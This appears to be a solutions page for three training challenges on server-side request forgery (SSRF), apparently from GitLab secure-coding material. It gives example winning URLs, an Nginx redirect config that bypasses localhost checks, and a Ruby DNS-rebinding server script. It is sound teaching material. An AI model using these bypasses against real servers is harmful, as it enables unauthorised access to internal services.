---
date: 2020-04-07
---
# Sea-surf Challenges

The goal of each of these challenged is to get the application to make a call
to `http://localhost:8080`. This is called a
[Server Side Request Forgery (SSRF)](https://www.owasp.org/index.php/Server_Side_Request_Forgery).
Each level applies additional validation of the `url` parameter, which requires
a different technique for completing the attack.

For more information on SSRF and how to defend against it, please see the [SSRF
page]() in the GitLab secure coding guidelines.

## Sea-surf Challenge (Difficulty 1)

In this challenge, the application is doing very little validation of the `url`
parameter. The goal is to identify the port on which the backend service is
listening. This is different than the external port, as the backend container
will be connecting to itself, and does not know the external port number.

Example Winning URL: `http://localhost:8080/`

## See-surf Challenge (Difficulty 2)

In this challenge, the application is validating that the `url` does not
directly reference `localhost` or any related IPv[4|6] addresses. This can
be bypassed by using an external URL that redirects to `http://localhost:8080/`.
With this configuration, the application will validate that the initial URL
as an external service, but will follow the redirect without validation.

The steps to execute the attack are as follows:
1. Setup an HTTP service that responds with a redirect to
`http://localhost:8080/`.
2. Use IP or hostname of that service as the input URL.
  * Example URL: `http://<External_IP_or_Hostname_of_Redirect_Service>`

Example Nginx configuration:

```
events {
        worker_connections 768;
        # multi_accept on;
}

http {
  server {
       listen 80;
       listen [::]:80;

       return 302 http://127.0.0.1:8080/;
  }
}
```

## Si-surf Challenge (Difficulty 3)

In this challenge, the application is validating the `url` parameter and
any `Location` url in a redirect. This should prevent the attack in the
previous challenge from working. These protections can be bypassed by using
a [DNS Rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) attack. In
this attack scenario, a routable IP is validated, but the connection is
made to an IP associated with `localhost`.

The steps to execute this attack are as follows:
1. Setup or find a DNS rebinding server. This server will alternate between
resolving to routable IP address and a `localhost` IP address for a given
hostname.
  * Example service:
    * https://lock.cmpxchg8b.com/rebinder.html
2. Use the hostname in the URL.
  * Example URL: `http://7f000001.08080808.rbndr.us:8080`
  * It might be necessary to submit the URL multiple times as it is
    necessary that the global IP address be validated and the localhost
    address be used in the connection.
  * It is necessary to include the port from the `Sea-surf` challenge,
    as the rebinding service only supplies the IP address.

Example rebinding DNS script suitable to self-host a rebinding service:

```ruby
require 'rubydns'
require 'date'

INTERFACES = [
    [:udp, "0.0.0.0", 53],
    [:tcp, "0.0.0.0", 53],
]

IN = Resolv::DNS::Resource::IN

cnt = 1

RubyDNS::run_server(INTERFACES) do
    match(%r{rebind.gtest.dev}, IN::A) do |transaction|
                puts "Incoming query: #{transaction}"
                res = cnt % 2 == 0 ? '8.8.8.8' : '127.0.0.1'
                cnt += 1
                dt = Time.now
                puts "#{dt} Sending response: #{res}"
        transaction.respond!(res, ttl: 0)
    end

    # Default DNS handler
    otherwise do |transaction|
                puts "Ignore query: #{transaction}"
    end
end
```
